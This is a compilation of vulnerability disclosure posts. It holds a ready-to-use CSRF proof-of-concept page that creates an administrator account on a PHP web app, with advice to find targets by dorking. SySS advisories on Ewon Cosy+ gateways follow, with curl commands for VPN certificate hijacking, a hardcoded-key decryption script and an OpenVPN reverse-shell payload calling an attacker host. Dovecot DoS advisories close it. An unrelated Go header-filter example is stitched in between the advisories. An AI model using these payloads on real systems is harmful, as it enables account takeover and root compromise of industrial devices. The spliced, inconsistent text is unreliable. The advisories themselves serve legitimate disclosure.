<pre><code>=============================================================================================================================================<br />| # Title : Accounting Journal Management System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /> <br />[+] Line 6 : Set your target url<br /><br />[+] Line 15 + 19 : Set user & pass<br /><br />[+] save payload as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html> <br /><html> <br /><body><br /> <script> function submitRequest() <br /> { var xhr = new XMLHttpRequest(); <br /> xhr.open("POST", "http://127.0.0.1/ajms/classes/Users.php?f=save", true);<br /> xhr.setRequestHeader("Accept", "*\/*"); <br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br /> xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");<br /> xhr.withCredentials = true; <br /> var body =<br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"username\"\r\n" + <br /> "\r\n" + <br /> "indoushka\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"password\"\r\n" + <br /> "\r\n" + <br /> "Hacked\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"type\"\r\n" + <br /> "\r\n" + <br /> "1\r\n" + <br /> "-------------------------------\r\n"; <br /> var aBody = new Uint8Array(body.length); <br /> for (var i = 0; i < aBody.length; i++) <br /> aBody[i] = body.charCodeAt(i); <br /> xhr.send(new Blob([aBody])); <br 
/> }<br /> </script><br /> <form action="#"><br /> <input type="button" value="Submit request" onclick="submitRequest();" /><br /> </form> <br /> </body> <br /> </html><br /><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-043<br />Product: Ewon Cosy+ / Talk2M Remote Access Solution<br />Manufacturer: HMS Industrial Networks AB<br />Affected Version(s): N.A.<br />Tested Version(s): N.A.<br />Vulnerability Type: Improper Authentication (CWE-287)<br />Risk Level: High<br />Solution Status: Fixed<br />Manufacturer Notification: 2024-04-17<br />Solution Date: 2024-04-18<br />Public Disclosure: 2024-08-11<br />CVE Reference: CVE-2024-33897<br />Author of Advisory: Moritz Abrell, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The Ewon Cosy+ is a VPN gateway used for remote access and maintenance<br />in industrial environments.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The Ewon Cosy+ gateway establishes a secure VPN connection between<br />the machine (PLC, HMI, or other devices) and the remote engineer.<br />The connection happens through Talk2m, a highly secured industrial<br />cloud service. 
The Ewon Cosy+ makes industrial remote access easy<br />and secure like never before!"<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />During account assignment in the Talk2M platform, a Cosy+ device<br />generates and sends a certificate signing request (CSR) to the back end.<br />This CSR is then signed by the manufacturer and used for OpenVPN<br />authentication by the device afterward.<br /><br />Since the common name (CN) of the certificate is specified by the device<br />and used in order to assign the OpenVPN session to the corresponding<br />Talk2M account, an attacker with root access to a Cosy+ device is able<br />to manipulate the CSR and get correctly signed certificates for foreign<br />devices.<br /><br />Using these certificates for OpenVPN authentication results in hijacking<br />the VPN session and allows for further attacks, e.g.:<br /><br />- Impacting the accessibility of the original device<br />- Attacking the Talk2M-connected user device via the VPN connection<br />- Eavesdropping and manipulating the network communication of connected<br /> users<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />Note: Since the X.509 client certificate of a Cosy+, which is used for<br /> authentication against the Talk2M API, is handled by the hardware<br /> security module (HSM), root access to a Cosy+ device is required.<br /><br /><br />1. Exporting the OpenSSL engine to use the hardware security module:<br /> <br /> $ export OPENSSL_CONF=/etc/ssl/se050_openssl.cnf<br /> $ export EX_SSS_BOOT_SSS_PORT=/dev/i2c-0<br /><br /><br />2. 
Sending a self-created CSR to the Talk2M API:<br /> <br /> $ curl --path-as-is -i -s -k -X $'POST' \<br /> -H $'Host: eu.device.talk2m.com' -H $'Accept: application/json' \<br /> -H $'Content-Type: application/json' -H $'Ewon-Serial: 2403-0999-25' \<br /> -H $'Device-State: AccountLinked' -H $'Content-Length: 768' \<br /> --data-binary $'{\x0a\x09\"csr\":<br /> \x09\"-----BEGIN CERTIFICATE REQUEST-----\\nMIIB6zCCAUwCAQAwgaY<br /> xCzAJBgNVBAYTAkJFMRcwFQYDVQQIEw5CcmFiYW50IFdh\\nbGxvbjERMA8GA1U<br /> EBxMITml2ZWxsZXMxIzAhBgNVBAoTGkhNUyBJbmR1c3RyaWFs\\nIE5ldHdvcmt<br /> zIFNBMRAwDgYDVQQLEwdFd29uIEJVMRYwFAYDVQQDEw1EMjMwNy0w\\nMTAxLTI<br /> 1MRwwGgYJKoZIhvcNAQkBFg1pbmZvQGV3b24uYml6MIGbMBAGByqGSM49\\nAgE<br /> GBSuBBAAjA4GGAAQBaUGPo1FIjOOqyd1M47M2fcLQ2MN3aj7wI8pBYmopdSEY\\<br /> nKszktBPre3AZ74E4326+vUej6nBG/17SWNb+VZPEyXYBAvEyyvsXfy/UlnB6NX<br /> aj\\n6rrmy2pqP5bKN/1yR3reqlA6+9rdYzcH3ESJvp9hTkZnV4qbdNjTtqSfZO<br /> 4zu1Zn\\nE+CgADAKBggqhkjOPQQDAgOBjAAwgYgCQgDVbJN5MJJZnkRRvNwwXu<br /> 6GrvILBN6H\\nxTwR3inwMxLf+a/o+SFiqq5Pvsm2UXebVSD3osopdnJ8cxzTzi<br /> PopsLiXAJCAa5K\\n+0T0H8VAvBzKTQkpiHHzW9JkDvIDaJA4WtYzA+KT7jo4kW<br /> vQIr7rBBOlILoofQzv\\nypCqHaugjHhdeuJecIiq\\n-----END CERTIFICAT<br /> E REQUEST-----\\n\"\x0a}' \<br /> $'https://eu.device.talk2m.com/certificates/csr' \<br /> --cert /tmp/birth_key_crt.pem --key /tmp/birth_key_ref.pem<br /><br /><br />3. Requesting the signed certificate:<br /> <br /> $ curl -i -k -H $'Device-State: AccountLinked' \<br /> https://device.talk2m.com/certificates/deviceCertificate \<br /> --cert birth_key_crt.pem --key birth_key_ref.pem<br /><br /><br />4. 
Talk2M response:<br /> <br /> HTTP/1.1 200<br /> date: Tue, 16 Apr 2024 13:09:57 GMT<br /> server: Apache<br /> ewon-server-time: 1713272998<br /> device-state: VpnProvisioned<br /> content-type: application/json<br /> transfer-encoding: chunked<br /> <br /> {"certificate":"-----BEGIN CERTIFICATE-----\nMIIDTjCCAjagAwIBA[...]<br /> KsxyR8w==\n-----END CERTIFICATE-----"}<br /><br /><br />5. This signed certificate and the used key can be used for OpenVPN<br /> authentication. The CN will be used to assign the session to the<br /> corresponding Talk2M account. This also overwrites a potential<br /> current VPN session of the original device:<br /><br /> $ openvpn --config attacker.ovpn<br /> Attempting to establish TCP connection with [AF_INET]51.195.79.69:443<br /> TCP connection established with [AF_INET]51.195.79.69:443<br /> TCPv4_CLIENT link remote: [AF_INET]51.195.79.69:443<br /> VERIFY OK: depth=1, C=BE, ST=Brabant Wallon, L=Nivelles, O=eWON sa,<br /> OU=Talk2M, CN=Talk2M Certification Authority,<br /> emailAddress=itmanager@talk2m.com<br /> VERIFY KU OK<br /> Validating certificate extended key usage<br /> ++ Certificate has EKU (str) TLS Web Server Authentication,<br /> expects TLS Web Server Authentication<br /> VERIFY EKU OK<br /> VERIFY OK: depth=0, C=BE, ST=Brabant Wallon, L=Nivelles,<br /> O=HMS Industrial Networks SA, OU=Talk2M, CN=server-device,<br /> emailAddress=info@ewon.biz<br /> Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384,<br /> peer certificate: 2048 bit RSA, signature: RSA-SHA1<br /> [server-device] Peer Connection Initiated with [AF_INET]51.195.79.69:443<br /> TUN/TAP device tap0 opened<br /> net_addr_ll_set: lladdr 00:03:27:d8:68:84 for tap0<br /> TUN/TAP link layer address set to 00:03:27:d8:68:84<br /> net_iface_mtu_set: mtu 1500 for tap0<br /> net_iface_up: set tap0 up<br /> net_addr_v4_add: 10.37.211.214/16 dev tap0<br /> Data Channel: cipher 'AES-256-GCM', peer-id: 0, compression: 'lzo'<br /> Timers: ping 10, 
ping-exit 40<br /> Initialization Sequence Completed<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The vulnerability was fixed in the back end by HMS on April 18, 2024.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-09: Potential vulnerability discovered<br />2024-04-16: Call with the manufacturer and requested a Talk2M account<br /> with an assigned device to verify the potential vulnerability<br />2024-04-16: Manufacturer provided a Talk2M account with an assigned device<br />2024-04-16: Vulnerability confirmed<br />2024-04-16: Short update about the state sent to the manufacturer<br />2024-04-16: Security advisory including technical details provided to<br /> the manufacturer<br />2024-04-18: Vulnerability fixed by the manufacturer<br />2024-04-30: CVE ID CVE-2024-33897[5] assigned by the manufacturer<br />2024-07-12: Manufacturer asked for reviewing the blog post draft<br />2024-07-12: Confirmed reviewing the blog post is possible and asking for<br /> the sending of details<br />2024-07-17: Blog post provided to HMS<br />2024-07-23: Inquiry about the status<br />2024-07-23: Manufacturer reviewed the blog post<br />2024-07-24: Manufacturer also asked for an appointment to discuss the blog post<br />2024-07-29: Discussion with HMS about the blog post and final publication<br /> actions<br />2024-08-11: Vulnerability disclosed at DEF CON[7]<br />2024-08-11: Blog post published[6]<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Ewon Cosy+ product website<br /> https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet<br />[2] SySS Security Advisory SYSS-2024-043<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-043.txt<br />[3] SySS Responsible Disclosure Policy<br /> 
https://www.syss.de/en/responsible-disclosure-policy<br />[4] Manufacturer note<br /> https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf<br />[5] CVE-2024-33897<br /> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33897<br />[6] Blog post<br /> https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/<br />[7] DEF CON talk<br /> https://defcon.org/html/defcon-32/dc-32-speakers.html#54521<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Abrell of SySS GmbH.<br /><br />E-Mail:moritz.abrell@syss.de<br />Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc<br />Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. 
The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL:http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>Affected product: Dovecot IMAP Server<br />Internal reference: DOV-6601<br />Vulnerability type: CWE-770 (Allocation of Resources Without Limits or Throttling)<br />Vulnerable version: 2.2, 2.3<br />Vulnerable component: lib-mail<br />Report confidence: Confirmed<br />Solution status: Fixed in 2.3.21.1<br />Researcher credits: Vendor internal discovery<br />Vendor notification: 2024-01-31<br />CVE reference: CVE-2024-23185<br />CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)<br /><br />Vulnerability Details:<br />Very large headers can cause resource exhaustion when parsing a message. The message-parser normally reads reasonably sized chunks of the message. However, when it feeds them to the message-header-parser, the header parser builds up a "full_value" buffer out of the smaller chunks. The full_value buffer has no size limit, so large headers can cause large memory usage. It doesn't matter whether it's a single long header line or a single header split into multiple lines. This bug exists in all Dovecot versions.<br /><br />Incoming mails typically have some size limits set by the MTA, so even the largest possible header size may still fit into Dovecot's vsz_limit. So attackers probably can't DoS a victim user this way. A user could APPEND larger mails, though, allowing them to DoS themselves (and possibly cause some memory issues for the backend in general).<br /><br />Workaround:<br />One can implement restrictions on headers on the MTA component preceding Dovecot.<br /><br />Fix:<br />Install a non-vulnerable version of Dovecot. The patch can be found at https://github.com/dovecot/core/compare/f020e13%5E...ce88c33.patch<br /><br /></code></pre>
<pre><code>Affected product: Dovecot IMAP Server<br />Internal reference: DOV-6464<br />Vulnerability type: CWE-770 (Allocation of Resources Without Limits or Throttling)<br />Vulnerable version: 2.2, 2.3<br />Vulnerable component: lib-mail<br />Report confidence: Confirmed<br />Solution status: Fixed in 2.3.21.1<br />Researcher credits: Vendor internal discovery<br />Vendor notification: 2024-01-30<br />CVE reference: CVE-2024-23184<br />CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N)<br /><br />Vulnerability Details:<br />Parsing a message with a large number of address headers (From, To, Cc, Bcc, etc.) becomes excessively CPU intensive. With 100k header lines CPU usage is already 12 seconds, and in a production environment we observed 500k header lines taking 18 minutes to parse. Since this can be triggered by external actors sending emails to a victim, this is a security issue.<br /><br />The main problem is that each header line's address is added to the end of a linked list, and the whole list is walked to find that end, so every additional address makes the next insertion slower.<br /><br />Workaround:<br />One can implement restrictions on address headers on the MTA component preceding Dovecot.<br /><br />Fix:<br />Install a non-vulnerable version of Dovecot. The patch can be found at https://github.com/dovecot/core/compare/8e4c42d%5E...1481c04.patch<br /><br /></code></pre>
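Both Dovecot advisories (CVE-2024-23185, unbounded full_value buffer; CVE-2024-23184, quadratic address-list append) give the same workaround: restrict headers at the MTA in front of Dovecot. The Go filter below is an added example, not Dovecot or vendor code, of such a pre-filter: it scans only the header section, bounds the whole section, each folded logical header and the number of address header lines, and reads in fixed bufio chunks so the filter itself never buffers a giant header. The limit values in DefaultLimits and the address-field list are constructed for the example; the messages in the test are constructed as well.

```go
package main

import (
	"bufio"
	"bytes"
	"errors"
	"io"
	"strings"
)

// HeaderLimits are the bounds an MTA-side filter enforces before a message
// reaches Dovecot (constructed defaults, not Dovecot settings).
type HeaderLimits struct {
	MaxHeaderBytes    int // whole header section (CVE-2024-23185: full_value is unbounded)
	MaxSingleHeader   int // one logical header, folded continuation lines included
	MaxAddressHeaders int // address header lines (CVE-2024-23184: list append walks the list)
}

var DefaultLimits = HeaderLimits{MaxHeaderBytes: 1 << 20, MaxSingleHeader: 64 << 10, MaxAddressHeaders: 500}

// addressFields are the RFC 5322 address headers that lib-mail parses into an address list.
var addressFields = map[string]bool{
	"from": true, "to": true, "cc": true, "bcc": true, "sender": true, "reply-to": true,
	"resent-from": true, "resent-to": true, "resent-cc": true, "resent-bcc": true, "resent-sender": true,
}

const (
	ReasonSectionTooLarge     = "header section exceeds MaxHeaderBytes"
	ReasonHeaderTooLarge      = "single header exceeds MaxSingleHeader"
	ReasonTooManyAddressLines = "address header lines exceed MaxAddressHeaders"
)

type Verdict struct {
	Accept         bool
	Reason         string
	HeaderBytes    int
	AddressHeaders int
	LargestHeader  int
}

// CheckHeaders scans the header section of r and never holds more than one
// bufio chunk, so a multi-megabyte header cannot exhaust the filter either.
func CheckHeaders(r io.Reader, lim HeaderLimits) Verdict {
	br := bufio.NewReader(r)
	v := Verdict{Accept: true}
	current := 0     // bytes of the logical header currently being read
	midLine := false // previous fragment hit ErrBufferFull: same physical line continues
	for {
		frag, err := br.ReadSlice('\n')
		v.HeaderBytes += len(frag)
		if v.HeaderBytes > lim.MaxHeaderBytes {
			return reject(v, ReasonSectionTooLarge)
		}
		if !midLine {
			if len(bytes.TrimRight(frag, "\r\n")) == 0 {
				return v // blank line (or EOF): end of the header section
			}
			if frag[0] == ' ' || frag[0] == '\t' {
				current += len(frag) // RFC 5322 folding: continuation of the previous header
			} else {
				current = len(frag)
				name, _, ok := bytes.Cut(frag, []byte(":"))
				if ok && addressFields[strings.ToLower(strings.TrimSpace(string(name)))] {
					v.AddressHeaders++
					if v.AddressHeaders > lim.MaxAddressHeaders {
						return reject(v, ReasonTooManyAddressLines)
					}
				}
			}
		} else {
			current += len(frag) // remainder of an over-long physical line
		}
		if current > v.LargestHeader {
			v.LargestHeader = current
		}
		if current > lim.MaxSingleHeader {
			return reject(v, ReasonHeaderTooLarge)
		}
		midLine = errors.Is(err, bufio.ErrBufferFull)
		if err != nil && !midLine {
			return v // EOF inside the header section: nothing left to check
		}
	}
}

func reject(v Verdict, reason string) Verdict {
	v.Accept, v.Reason = false, reason
	return v
}
```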
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-032<br />Product: Ewon Cosy+<br />Manufacturer: HMS Industrial Networks AB<br />Affected Version(s): Firmware Versions: < 21.2s10 and < 22.1s3<br />Tested Version(s): Firmware Version: 21.2s7<br />Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321)<br />Risk Level: Medium<br />Solution Status: Fixed<br />Manufacturer Notification: 2024-04-10<br />Solution Date: 2024-07-18<br />Public Disclosure: 2024-08-11<br />CVE Reference: CVE-2024-33895<br />Author of Advisory: Moritz Abrell, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The Ewon Cosy+ is a VPN gateway used for remote access and maintenance<br />in industrial environments.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The Ewon Cosy+ gateway establishes a secure VPN connection between<br />the machine (PLC, HMI, or other devices) and the remote engineer.<br />The connection happens through Talk2m, a highly secured industrial<br />cloud service. 
The Ewon Cosy+ makes industrial remote access easy<br />and secure like never before!"<br /><br />Due to the use of a hardcoded cryptographic key, an attacker is able to<br />decrypt encrypted data and retrieve sensitive information.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The Ewon Cosy+ stores sensitive data such as passwords in an encrypted<br />format.<br />These values are included, e.g., in configuration backups.<br /><br />However, a symmetric encryption algorithm (AES-CBC-256) with hardcoded<br />and static cryptographic keys is used.<br />Thus, an attacker is able to decrypt that data and retrieve sensitive<br />information.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />By analyzing the ELF executable "ewon" of an Ewon Cosy+ in a disassembler<br />and decompiler, e.g. Ghidra, the encryption mechanism could be reversed<br />and the hardcoded cryptographic key could be extracted.<br /><br />Used encryption algorithm: AES in CBC mode with a key length of 256 bit<br /><br />A simple Python script was developed to decrypt encrypted values:<br /><br />********************<br />import base64<br />import sys<br />from Crypto.Cipher import AES<br />from binascii import unhexlify<br /><br /><br />def pad(text):<br /> padding_length = AES.block_size - (len(text) % AES.block_size)<br /> padded_text = text + bytes([padding_length] * padding_length)<br /> return padded_text, padding_length<br /><br /><br />encoded_text = sys.argv[1]<br /><br />key_hex = "6367b0 [...]" # redacted<br />iv_hex = "28c9 [...]" # redacted<br /><br />key = unhexlify(key_hex)<br />iv = unhexlify(iv_hex)<br /><br />decoded_text = base64.b64decode(encoded_text[4:])<br />padded_text, padding_length = pad(decoded_text)<br />cipher = AES.new(key, AES.MODE_CBC, iv)<br />decrypted_text = cipher.decrypt(padded_text)<br /><br 
/>print("Plaintext: {}".format(<br /> decrypted_text[1:][:-padding_length-2].decode('utf-8')<br /> ))<br />****************<br /><br />$> python3 decrypt_ewon_pwd.py "#_5_YARU3GSgNcElltjyMMqWfZwb"<br />Plaintext: adm:123<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />According to the manufacturer note[4], the vulnerability was fixed<br />with the firmware versions 21.2s10 and 22.1s3.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-04: Vulnerability discovered<br />2024-04-10: Vulnerability reported to manufacturer<br />2024-04-11: Manufacturer acknowledged the vulnerabilities and asked for<br /> a publication date for all findings<br />2024-04-12: Proposed dates for a discussion about publication<br />2024-04-19: Manufacturer sent a technical overview of planned remediation<br /> actions and details about the planned timeline<br />2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer<br />2024-05-31: Manufacturer informed that the fix is in completion stage and<br /> asked if the blog post[6] can be reviewed by HMS<br />2024-06-04: Proposed dates to review the blog post draft<br />2024-06-21: Inquiry about the status<br />2024-06-21: Received an out-of-office auto reply<br />2024-07-01: Inquiry about the status<br />2024-07-04: Inquiry about the status<br />2024-07-12: Inquiry about the status and letting the manufacturer know that<br /> the vulnerability will be published within a talk at DEF CON[7]<br /> in August<br />2024-07-12: Manufacturer responded that the fix is planned by the end of<br /> July; manufacturer asked again for reviewing the blog post<br /> draft<br />2024-07-12: Again confirmed reviewing the blog post is possible and asking<br /> for the sending of details<br />2024-07-17: Blog post provided to HMS<br />2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS<br 
/>2024-07-23: Inquiry about the status<br />2024-07-23: Manufacturer reviewed the blog post and confirmed that a<br /> fix is provided<br />2024-07-29: Discussion with HMS about the blog post and final publication<br /> actions<br />2024-08-11: Vulnerability disclosed at DEF CON[7]<br />2024-08-11: Blog post published[6]<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Ewon Cosy+ product website<br /> https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet<br />[2] SySS Security Advisory SYSS-2024-032<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-032.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] Manufacturer note<br /> https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf<br />[5] CVE-2024-33895<br /> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33895<br />[6] Blog post<br /> https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/<br />[7] DEF CON talk<br /> https://defcon.org/html/defcon-32/dc-32-speakers.html#54521<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Abrell of SySS GmbH.<br /><br />E-Mail:moritz.abrell@syss.de<br />Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc<br />Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. 
The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL:http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-018<br />Product: Ewon Cosy+<br />Manufacturer: HMS Industrial Networks AB<br />Affected Version(s): Firmware Versions: < 21.2s10 and < 22.1s3<br />Tested Version(s): Firmware Version: 21.2s7<br />Vulnerability Type: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CWE-78)<br />Risk Level: Medium<br />Solution Status: Fixed<br />Manufacturer Notification: 2024-03-27<br />Solution Date: 2024-07-18<br />Public Disclosure: 2024-08-11<br />CVE Reference: CVE-2024-33896<br />Author of Advisory: Moritz Abrell, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The Ewon Cosy+ is a VPN gateway used for remote access and maintenance<br />in industrial environments.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The Ewon Cosy+ gateway establishes a secure VPN connection between<br />the machine (PLC, HMI, or other devices) and the remote engineer.<br />The connection happens through Talk2m, a highly secured industrial<br />cloud service. 
The Ewon Cosy+ makes industrial remote access easy<br />and secure like never before!"<br /><br />Due to improper neutralization of parameters read from a user-controlled<br />configuration file, an authenticated attacker is able to inject and execute<br />OS commands on the device.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />Authenticated attackers are able to upload a custom OpenVPN configuration.<br />This configuration can contain the OpenVPN parameters "--up" and "--down",<br />which execute a specified script or executable.<br /><br />Since the process itself runs with the highest privileges (root),<br />this allows the device to be completely compromised.<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />1. Generate a malicious OpenVPN configuration, e.g. instructing the device<br /> to create a reverse shell:<br /><br /> client<br /> dev tun<br /> persist-tun<br /> proto tcp<br /> verb 5<br /> mute 20<br /> --up '/bin/sh -c "TF=$(mktemp -u);mkfifo $TF;telnet <attacker-ip> 5000 0<$TF | sh 1>$TF"'<br /> script-security 2<br /> [...]<br /><br />2. Start a listener on the attacker system:<br /> #> nc -lvp 5000<br /><br />3. Upload the OpenVPN configuration via FTP to Cosy+.<br /><br />4. Set the configuration parameter "VPNCfgFile" to "/usr/<vpnfile>".<br /><br />5. 
Command is executed by Cosy+ and a reverse shell is initiated:<br /><br /> nc -lvp 5000<br /> Listening on 0.0.0.0 5000<br /> Connection received on 192.168.10.240 56806<br /> id<br /> uid=0(root) gid=0(root)<br /><br /><br />Note:<br /> The parameters "--up" and "--down" need to be specified with<br /> two dashes since the values "up" and "down" are blocklisted on the<br /> device.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />According to the manufacturer note[4], the vulnerability was fixed<br />with the firmware versions 21.2s10 and 22.1s3.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-03-26: Vulnerability discovered<br />2024-03-27: Vulnerability reported to manufacturer<br />2024-04-02: Inquiry about the status<br />2024-04-05: Manufacturer acknowledged the vulnerability and started the<br /> analysis<br />2024-04-10: Two more vulnerabilities reported to the manufacturer<br /> (SYSS-2024-032 and SYSS-2024-033)<br />2024-04-11: Manufacturer acknowledged the vulnerabilities and asked for<br /> a publication date for all findings<br />2024-04-12: Proposed dates for a discussion about publication<br />2024-04-15: Manufacturer sent a technical overview of planned remediation<br /> actions and details about the planned timeline<br />2024-04-15: Acknowledged the remediation actions and asked the manufacturer<br /> for assigning a CVE ID<br />2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer<br />2024-05-31: Manufacturer informed that the fix is in completion stage and<br /> asked if the blog post[6] can be reviewed by HMS<br />2024-06-04: Proposed dates to review the blog post draft<br />2024-06-21: Inquiry about the status<br />2024-06-21: Received an out-of-office auto reply<br />2024-07-01: Inquiry about the status<br />2024-07-04: Inquiry about the status<br />2024-07-12: Inquiry about the status 
